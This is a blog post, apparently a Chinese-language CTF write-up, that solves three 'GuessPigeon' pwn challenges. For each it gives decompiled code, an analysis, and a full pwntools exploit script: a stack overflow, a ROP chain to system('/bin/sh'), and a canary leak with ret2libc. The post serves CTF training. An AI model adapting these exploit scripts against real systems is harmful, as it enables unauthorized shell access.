<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 3.8.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/font-awesome.min.css">


<script id="hexo-configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    hostname: new URL('https://mrh1s.top').hostname,
    root: '/',
    scheme: 'Pisces',
    version: '7.7.0',
    exturl: false,
    sidebar: {"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},
    copycode: {"enable":false,"show_result":false,"style":null},
    back2top: {"enable":true,"sidebar":false,"scrollpercent":false},
    bookmark: {"enable":false,"color":"#222","save":"auto"},
    fancybox: false,
    mediumzoom: false,
    lazyload: false,
    pangu: false,
    comments: {"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},
    algolia: {
      appID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    },
    localsearch: {"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},
    path: '',
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}
  };
</script>

  <meta name="description" content="CNSS-PWN GuessPigeon.7z  GuessPigeonanalyzeunsigned int __cdecl guess(int a1)&amp;#123;  char nptr; // [esp+8h] [ebp-70h]  unsigned int v3; // [esp+6Ch] [ebp-Ch]  v3 = __readgsdword(0x14u);  puts(&quot;Please">
<meta name="keywords" content="pwn_stack_overflow,pwn_canary">
<meta property="og:type" content="article">
<meta property="og:title" content="CNSS-PWN招新三部曲">
<meta property="og:url" content="https://mrh1s.top/posts/7c773b71/index.html">
<meta property="og:site_name" content="mrh929&#39;s home">
<meta property="og:description" content="CNSS-PWN GuessPigeon.7z  GuessPigeonanalyzeunsigned int __cdecl guess(int a1)&amp;#123;  char nptr; // [esp+8h] [ebp-70h]  unsigned int v3; // [esp+6Ch] [ebp-Ch]  v3 = __readgsdword(0x14u);  puts(&quot;Please">
<meta property="og:locale" content="en">
<meta property="og:updated_time" content="2019-09-14T04:02:14.038Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="CNSS-PWN招新三部曲">
<meta name="twitter:description" content="CNSS-PWN GuessPigeon.7z  GuessPigeonanalyzeunsigned int __cdecl guess(int a1)&amp;#123;  char nptr; // [esp+8h] [ebp-70h]  unsigned int v3; // [esp+6Ch] [ebp-Ch]  v3 = __readgsdword(0x14u);  puts(&quot;Please">

<link rel="canonical" href="https://mrh1s.top/posts/7c773b71/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome: false,
    isPost: true
  };
</script>

  <title>CNSS-PWN招新三部曲 | mrh929's home</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-meta">

    <div>
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">mrh929's home</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
  </div>

  <div class="site-nav-toggle">
    <div class="toggle" aria-label="Toggle navigation bar">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>
</div>


<nav class="site-nav">
  
  <ul id="menu" class="menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-fw fa-home"></i>Home</a>

  </li>
        <li class="menu-item menu-item-about">

    <a href="/about/" rel="section"><i class="fa fa-fw fa-user"></i>About</a>

  </li>
  </ul>

</nav>
</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content">
            

  <div class="posts-expand">
      
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block " lang="en">
    <link itemprop="mainEntityOfPage" href="https://mrh1s.top/posts/7c773b71/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="mrh929">
      <meta itemprop="description" content="Blog">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="mrh929's home">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          CNSS-PWN招新三部曲
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              <span class="post-meta-item-text">Posted on</span>
              

              <time title="Created: 2019-09-14 11:10:15 / Modified: 12:02:14" itemprop="dateCreated datePublished" datetime="2019-09-14T11:10:15+08:00">2019-09-14</time>
            </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              <span class="post-meta-item-text">In</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/write-up/" itemprop="url" rel="index">
                    <span itemprop="name">write up</span>
                  </a>
                </span>
                  , 
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/write-up/cnss-recruit-201809/" itemprop="url" rel="index">
                    <span itemprop="name">cnss_recruit_201809</span>
                  </a>
                </span>
            </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h1 id="CNSS-PWN"><a href="#CNSS-PWN" class="headerlink" title="CNSS-PWN"></a>CNSS-PWN</h1><p> <a href="\uploads\GuessPigeon.7z">GuessPigeon.7z</a> </p>
<h2 id="GuessPigeon"><a href="#GuessPigeon" class="headerlink" title="GuessPigeon"></a>GuessPigeon</h2><h3 id="analyze"><a href="#analyze" class="headerlink" title="analyze"></a>analyze</h3><figure class="highlight c++"><table><tr><td class="code"><pre><span class="line"><span class="keyword">unsigned</span> <span class="keyword">int</span> __<span class="function">cdecl <span class="title">guess</span><span class="params">(<span class="keyword">int</span> a1)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  <span class="keyword">char</span> nptr; <span class="comment">// [esp+8h] [ebp-70h]</span></span><br><span class="line">  <span class="keyword">unsigned</span> <span class="keyword">int</span> v3; <span class="comment">// [esp+6Ch] [ebp-Ch]</span></span><br><span class="line"></span><br><span class="line">  v3 = __readgsdword(<span class="number">0x14</span>u);</span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">"Please input your guess:"</span>);</span><br><span class="line">  __isoc99_scanf(<span class="string">"%s"</span>, &amp;nptr);</span><br><span class="line">  <span class="keyword">if</span> ( atoi(&amp;nptr) == a1 )</span><br><span class="line">  &#123;</span><br><span class="line">    <span class="built_in">puts</span>(<span class="string">"My Gooood!You guessed the pigeon number!!"</span>);</span><br><span class="line">    getshell();</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">else</span></span><br><span class="line">  &#123;</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">"You are wrong!The pigeon's number is %d\n try again~"</span>, a1);</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">return</span> __readgsdword(<span class="number">0x14</span>u) ^ v3;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>可见 scanf处没有限制字符串长度大小，可以通过该处进行栈溢出</p>
<p>a1是调用guess函数时传入的参数，存在栈里面</p>
<p>nptr为输入的字符串，也存在栈里面</p>
<p>可知进行栈溢出可以将a1和nptr覆盖成一样的形式，从而getshell</p>
<p>虽然这道题有canary，但是并没有起到作用</p>
<blockquote>
<p>char nptr; // [esp+8h] [ebp-70h]</p>
<p>题外话：关于padding的长度，<strong>一定要用gdb调试后算出来！！</strong></p>
<p>用ida眼睛看的十有八九都是错的！！</p>
</blockquote>
<h3 id="exp-py"><a href="#exp-py" class="headerlink" title="exp.py"></a>exp.py</h3><figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">p = remote(<span class="string">"132.232.34.26"</span>,<span class="number">8888</span>)</span><br><span class="line">p.recvuntil(<span class="string">'input your token:'</span>)</span><br><span class="line">p.sendline(<span class="string">"GuessPigeon"</span>)</span><br><span class="line"></span><br><span class="line">payload = <span class="string">'123'</span> + <span class="string">'\x00'</span></span><br><span class="line">payload += <span class="string">'a'</span> * <span class="number">0x74</span></span><br><span class="line">payload += p32(<span class="number">123</span>)</span><br><span class="line"></span><br><span class="line">p.recvuntil(<span class="string">'Please input your guess:'</span>)</span><br><span class="line">p.sendline(payload)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>

<h2 id="GuessPigeon2"><a href="#GuessPigeon2" class="headerlink" title="GuessPigeon2"></a>GuessPigeon2</h2><h3 id="analyze-1"><a href="#analyze-1" class="headerlink" title="analyze"></a>analyze</h3><figure class="highlight c++"><table><tr><td class="code"><pre><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">guess</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  <span class="keyword">int</span> result; <span class="comment">// eax</span></span><br><span class="line">  <span class="keyword">char</span> buf; <span class="comment">// [rsp+0h] [rbp-70h]</span></span><br><span class="line"></span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">"Please input your guess:"</span>);</span><br><span class="line">  __isoc99_scanf(<span class="string">"%s"</span>, &amp;buf);</span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">"You've been fooled.There are no pigenos here!\n Good bye~"</span>);</span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">"Do you want to get hint? yes/no?"</span>);</span><br><span class="line">  read(<span class="number">0</span>, &amp;buf, <span class="number">0x100</span>uLL);</span><br><span class="line">  result = <span class="built_in">strcmp</span>(&amp;buf, <span class="string">"yes"</span>);</span><br><span class="line">  <span class="keyword">if</span> ( !result )</span><br><span class="line">    result = <span class="built_in">printf</span>(<span class="string">"Do you know \"%s\"\n"</span>, s);</span><br><span class="line">  <span class="keyword">return</span> result;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>这次的ELF文件是64位的，传参方式为寄存器传参，这意味着我们需要用到ROP链来构造一段代码把参数传到寄存器里面去</p>
<h4 id="rop"><a href="#rop" class="headerlink" title="rop"></a>rop</h4><figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">ROPgadget --binary GuessPigeon2 --only <span class="string">'pop|ret'</span> | grep <span class="string">'rdi'</span></span><br></pre></td></tr></table></figure>

<blockquote>
<p>0x0000000000400933 : pop rdi ; ret</p>
</blockquote>
<h4 id="binsh"><a href="#binsh" class="headerlink" title="binsh"></a>binsh</h4><p>同时 字符串s刚好指向了 /bin/sh，利用system(s)可以getshell</p>
<p>查询了一下，system函数刚好存在于elf文件中，直接引用即可</p>
<blockquote>
<p>0x400650</p>
</blockquote>
<p>程序执行完guess之后，会跳到pop_rdi_ret的函数处，将rdi赋值为s的地址，接着调用system()，从而getshell</p>
<h3 id="exp-py-1"><a href="#exp-py-1" class="headerlink" title="exp.py"></a>exp.py</h3><figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line"><span class="comment">#p = process('./GuessPigeon2')</span></span><br><span class="line">p = remote(<span class="string">'132.232.34.26'</span>,<span class="number">8888</span>)</span><br><span class="line"></span><br><span class="line">pop_rdi_ret = <span class="number">0x400933</span></span><br><span class="line">system_addr = <span class="number">0x400650</span></span><br><span class="line">binsh_addr = <span class="number">0x600E20</span></span><br><span class="line"></span><br><span class="line">payload = <span class="string">'a'</span> * <span class="number">0x78</span></span><br><span class="line">payload += p64(pop_rdi_ret)</span><br><span class="line">payload += p64(binsh_addr)</span><br><span class="line">payload += p64(system_addr)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">p.recvuntil(<span class="string">'input your token:'</span>)</span><br><span class="line">p.sendline(<span class="string">'GuessPigeon2'</span>)</span><br><span class="line"></span><br><span class="line">p.recvuntil(<span class="string">"Please input your guess:"</span>)</span><br><span class="line">p.sendline(<span class="string">'a'</span>)</span><br><span class="line"></span><br><span class="line">p.recvuntil(<span class="string">"Do you want to get hint? yes/no?"</span>)</span><br><span class="line">p.sendline(payload)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>

<h2 id="GuessPigeon3"><a href="#GuessPigeon3" class="headerlink" title="GuessPigeon3"></a>GuessPigeon3</h2><h3 id="analyze-2"><a href="#analyze-2" class="headerlink" title="analyze"></a>analyze</h3><figure class="highlight c++"><table><tr><td class="code"><pre><span class="line"><span class="function"><span class="keyword">unsigned</span> <span class="keyword">int</span> <span class="title">guess</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  <span class="keyword">char</span> buf; <span class="comment">// [esp+8h] [ebp-70h]</span></span><br><span class="line">  <span class="keyword">unsigned</span> <span class="keyword">int</span> v2; <span class="comment">// [esp+6Ch] [ebp-Ch]</span></span><br><span class="line"></span><br><span class="line">  v2 = __readgsdword(<span class="number">0x14</span>u);</span><br><span class="line">  <span class="built_in">memset</span>(&amp;buf, <span class="number">0</span>, <span class="number">0x64</span>u);</span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">"You You have two chances. Please input your guess:"</span>);</span><br><span class="line">  read(<span class="number">0</span>, &amp;buf, <span class="number">0x100</span>u);</span><br><span class="line">  <span class="built_in">printf</span>(<span class="string">"You guessed the pigeon number is %s .\nI'm sorry, you guessed wrong."</span>, &amp;buf);</span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">"Please input your guess again:"</span>);</span><br><span class="line">  read(<span class="number">0</span>, &amp;buf, <span class="number">0x100</span>u);</span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">"You've been fooled.There are no pigenos here!\n Good bye~"</span>);</span><br><span class="line">  <span class="keyword">return</span> __readgsdword(<span class="number">0x14</span>u) ^ v2;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>我们checksec一下</p>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">[*] <span class="string">'/home/mrh929/Desktop/cnss/GuessPigeon3/GuessPigeon3'</span></span><br><span class="line">    Arch:     i386-32-little</span><br><span class="line">    RELRO:    Partial RELRO</span><br><span class="line">    Stack:    Canary found</span><br><span class="line">    NX:       NX enabled</span><br><span class="line">    PIE:      No PIE (0x8048000)</span><br></pre></td></tr></table></figure>

<p>程序开启了Canary和栈不可执行，guess函数中有两个read函数，即有两个溢出点</p>
<p>第一个溢出点的后面紧跟着一个printf，推测可能是用来泄露canary用的</p>
<h4 id="canary"><a href="#canary" class="headerlink" title="canary"></a>canary</h4><p><a href="https://ctf-wiki.github.io/ctf-wiki/pwn/linux/mitigation/canary-zh/" target="_blank" rel="noopener">https://ctf-wiki.github.io/ctf-wiki/pwn/linux/mitigation/canary-zh/</a></p>
<p><strong>canary</strong>是一种防止栈溢出的方式，通过在执行函数之前生成一个随机的canary，可以防止在函数结束之前有人通过read, scanf等不安全的函数进行栈溢出攻击，程序结束时会<strong>stack_check_fail</strong>，一旦canary被改变，程序将会马上退出</p>
<p><strong>canary</strong>的特点是最低位为0, eg: 0x49d8c100 ，本意是将printf截断，我们在用padding填充的时候可以sendline，即在最后一位填上一个’\n’，就可以做到将canary输出，当然最后要记得canary = out - ‘a’</p>
<h4 id="libc"><a href="#libc" class="headerlink" title="libc"></a>libc</h4><p>程序中没有给出system函数和/bin/sh字符串</p>
<p>但是给了一个libc文件，libc文件是一个动态链接库，程序通过读取这个动态链接库来执行它想要的函数</p>
<p>当然这个动态链接库的地址就<strong>不是固定的了</strong>，虽然我们静态分析的时候会得到一个<strong>静态的地址</strong>，但这个并不是动态链接库的最终地址，我们需要将程序运行之后某个libc函数的地址泄露出来，算出它与libc中的静态地址的偏移，从而得到libc中每个函数的真实地址</p>
<h4 id="plt-got"><a href="#plt-got" class="headerlink" title="plt got"></a>plt got</h4><p><a href="https://ctf-wiki.github.io/ctf-wiki/executable/elf/elf-structure-zh/#global-offset-table" target="_blank" rel="noopener">https://ctf-wiki.github.io/ctf-wiki/executable/elf/elf-structure-zh/#global-offset-table</a></p>
<p>plt的本质上是一个指向got表的指针，系统调用函数的时候会首先jmp plt，由plt进行push ，再jmp的操作，最终读取到got表，将eip指向函数的真实地址。</p>
<p>这个生成got表的动作是<strong>动态</strong>的，所以在我们没有调用某个函数时这个函数的got表将<strong>不存有任何地址信息</strong>。我们想要得到某个libc函数的真实地址，最好的方法是找准一个已经被系统执行的函数，查询它的got表，从而得到这个函数的真实地址。</p>
<p>这道题中puts和read函数都是被程序执行过的，我们随意选取一个函数</p>
<p>用  <strong>elf.got[‘puts’]</strong> 调出got表地址，利用write<strong>（三个参数）</strong>或者puts<strong>（一个参数）</strong>函数将其输出</p>
<p>相当于把guess函数的返回地址设置为write/puts</p>
<blockquote>
<p>注意，这里调用write/puts函数的本质也是调用plt表，在汇编层面其实等价于jmp addr</p>
<p>而这些函数都是需要ret/ leave 的，所以相应的我们应当在 write_plt 后面<strong>先加入一个 ret_addr</strong> ，再push 参数</p>
</blockquote>
<h4 id="after-that"><a href="#after-that" class="headerlink" title="after that"></a>after that</h4><p>同样的，注意canary 和 write_plt之间也有12个字节的padding，我第一次做这题的时候也是在padding上面卡了很久，一定要用gdb仔细调试才能得出padding长度！！</p>
<p>ret_addr可以设置为guess，因为guess函数有两个溢出点，可以继续栈溢出</p>
<p>在我们得到read的真实地址之后，我们就可以通过</p>
<p><strong>read_addr - libc.symbols[‘read’]</strong> </p>
<p>来得出偏移offset了，现在我们就可以知道任何一个函数的真实地址了</p>
<p>再执行一遍guess，同样的要获取canary并且构造payload。</p>
<p>最后压入/bin/sh参数，执行system()</p>
<h4 id="little-trick"><a href="#little-trick" class="headerlink" title="little trick"></a>little trick</h4><figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="keyword">import</span> pwnlib</span><br><span class="line">pwnlib.gdb.attach(process)</span><br></pre></td></tr></table></figure>

<p>可以对pwntools的过程进行调试</p>
<h3 id="exp-py-2"><a href="#exp-py-2" class="headerlink" title="exp.py"></a>exp.py</h3><figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="keyword">import</span> pwnlib</span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line"><span class="comment">#p = process('./GuessPigeon3')</span></span><br><span class="line"></span><br><span class="line">p = remote(<span class="string">'132.232.34.26'</span>,<span class="number">8888</span>)</span><br><span class="line">p.recvuntil(<span class="string">'token:'</span>)</span><br><span class="line">p.sendline(<span class="string">'GuessPigeon3'</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">elf = ELF(<span class="string">'./GuessPigeon3'</span>)</span><br><span class="line">libc = ELF(<span class="string">'libc.so.6'</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">ret_addr = elf.symbols[<span class="string">'guess'</span>]</span><br><span class="line">write_got = elf.got[<span class="string">'write'</span>]</span><br><span class="line">write_plt = elf.plt[<span class="string">'write'</span>]</span><br><span class="line">puts_plt = elf.plt[<span class="string">'puts'</span>]</span><br><span class="line"></span><br><span class="line">payload1 = <span class="string">'a'</span> *<span class="number">100</span></span><br><span class="line">p.recvuntil(<span class="string">'Please input your guess:'</span>)</span><br><span class="line">p.sendline(payload1)</span><br><span class="line">p.recvuntil(payload1)</span><br><span class="line">canary = u32(p.recv(<span class="number">4</span>)) - <span class="number">0xa</span> <span class="comment">#get canary value</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">print</span> <span class="string">"canary = "</span> + str(hex(canary))</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">payload2 = <span class="string">'b'</span>*<span class="number">100</span> + p32(canary) + <span class="string">'b'</span>* <span class="number">12</span></span><br><span class="line">payload2 += p32(puts_plt) + p32(ret_addr) + p32(write_got)  </span><br><span class="line"></span><br><span class="line">p.recvuntil(<span class="string">"your guess again:"</span>)</span><br><span class="line">p.send(payload2)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">p.recvuntil(<span class="string">'Good bye~\n'</span>)</span><br><span class="line">write_addr = u32(p.recv(<span class="number">4</span>))</span><br><span class="line"><span class="keyword">print</span> <span class="string">"libc_read_addr = "</span> + hex(write_addr)</span><br><span class="line"></span><br><span class="line"><span class="comment"># return to guess()</span></span><br><span class="line"></span><br><span class="line">payload3 = <span class="string">'c'</span> * <span class="number">100</span></span><br><span class="line">p.recvuntil(<span class="string">'Please input your guess:'</span>)</span><br><span class="line">p.sendline(payload3)</span><br><span class="line">p.recvuntil(payload3)</span><br><span class="line">canary = u32(p.recv(<span class="number">4</span>)) - <span class="number">0xa</span> <span class="comment">#another canary</span></span><br><span class="line"><span class="keyword">print</span> <span class="string">"canary' = "</span> + str(hex(canary))</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">libc_write = libc.symbols[<span class="string">'write'</span>]</span><br><span class="line">libc_system = libc.symbols[<span class="string">'system'</span>]</span><br><span class="line">libc_binsh = libc.search(<span class="string">'/bin/sh'</span>).next()</span><br><span class="line">offset = write_addr - libc_write <span class="comment">#offset between real_addr and libc_addr</span></span><br><span class="line">system_addr = offset + libc_system</span><br><span class="line">binsh_addr = offset + libc_binsh</span><br><span class="line"></span><br><span class="line">payload4 = <span class="string">'d'</span>*<span class="number">100</span> + p32(canary)</span><br><span class="line">payload4 += <span class="string">'b'</span>*<span class="number">12</span></span><br><span class="line">payload4 += p32(system_addr) + p32(ret_addr) + p32(binsh_addr)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">p.recvuntil(<span class="string">'again:'</span>)</span><br><span class="line">p.sendline(payload4)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>


    </div>

    
    
    
        

<div>
<ul class="post-copyright">
  <li class="post-copyright-author">
    <strong>Post author:  </strong>mrh929
  </li>
  <li class="post-copyright-link">
    <strong>Post link: </strong>
    <a href="https://mrh1s.top/posts/7c773b71/" title="CNSS-PWN招新三部曲">https://mrh1s.top/posts/7c773b71/</a>
  </li>
  <li class="post-copyright-license">
    <strong>Copyright Notice:  </strong>All articles in this blog are licensed under <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/en" rel="noopener" target="_blank"><i class="fa fa-fw fa-creative-commons"></i>BY-NC-SA</a> unless stating additionally.
  </li>
</ul>
</div>


      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/pwn-stack-overflow/" rel="tag"># pwn_stack_overflow</a>
              <a href="/tags/pwn-canary/" rel="tag"># pwn_canary</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/posts/77b618a/" rel="prev" title="deflat">
      <i class="fa fa-chevron-left"></i> deflat
    </a></div>
      <div class="post-nav-item">
    <a href="/posts/1e65a7e/" rel="next" title="说说学校奖学金的事">
      说说学校奖学金的事 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  

  </div>


          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let activeClass = CONFIG.comments.activeClass;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          Table of Contents
        </li>
        <li class="sidebar-nav-overview">
          Overview
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#CNSS-PWN"><span class="nav-number">1.</span> <span class="nav-text">CNSS-PWN</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#GuessPigeon"><span class="nav-number">1.1.</span> <span class="nav-text">GuessPigeon</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#analyze"><span class="nav-number">1.1.1.</span> <span class="nav-text">analyze</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#exp-py"><span class="nav-number">1.1.2.</span> <span class="nav-text">exp.py</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#GuessPigeon2"><span class="nav-number">1.2.</span> <span class="nav-text">GuessPigeon2</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#analyze-1"><span class="nav-number">1.2.1.</span> <span class="nav-text">analyze</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#rop"><span class="nav-number">1.2.1.1.</span> <span class="nav-text">rop</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#binsh"><span class="nav-number">1.2.1.2.</span> <span class="nav-text">binsh</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#exp-py-1"><span class="nav-number">1.2.2.</span> <span class="nav-text">exp.py</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#GuessPigeon3"><span class="nav-number">1.3.</span> <span class="nav-text">GuessPigeon3</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#analyze-2"><span class="nav-number">1.3.1.</span> <span class="nav-text">analyze</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#canary"><span class="nav-number">1.3.1.1.</span> <span class="nav-text">canary</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#libc"><span class="nav-number">1.3.1.2.</span> <span class="nav-text">libc</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#plt-got"><span class="nav-number">1.3.1.3.</span> <span class="nav-text">plt got</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#after-that"><span class="nav-number">1.3.1.4.</span> <span class="nav-text">after that</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#little-trick"><span class="nav-number">1.3.1.5.</span> <span class="nav-text">little trick</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#exp-py-2"><span class="nav-number">1.3.2.</span> <span class="nav-text">exp.py</span></a></li></ol></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">mrh929</p>
  <div class="site-description" itemprop="description">Blog</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/posts">
          <span class="site-state-item-count">79</span>
          <span class="site-state-item-name">posts</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
        <span class="site-state-item-count">20</span>
        <span class="site-state-item-name">categories</span>
      </div>
      <div class="site-state-item site-state-tags">
        <span class="site-state-item-count">16</span>
        <span class="site-state-item-name">tags</span>
      </div>
  </nav>
</div>
  <div class="cc-license motion-element" itemprop="license">
    <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/en" class="cc-opacity" rel="noopener" target="_blank"><img src="/images/cc-by-nc-sa.svg" alt="Creative Commons"></a>
  </div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2020</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">mrh929</span>
</div>
  <div class="powered-by">Powered by <a href="https://hexo.io" class="theme-link" rel="noopener" target="_blank">Hexo</a> v3.8.0
  </div>
  <span class="post-meta-divider">|</span>
  <div class="theme-info">Theme – <a href="https://pisces.theme-next.org" class="theme-link" rel="noopener" target="_blank">NexT.Pisces</a> v7.7.0
  </div>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>
<script src="/js/utils.js"></script><script src="/js/motion.js"></script>
<script src="/js/schemes/pisces.js"></script>
<script src="/js/next-boot.js"></script>



  















  

  

</body>
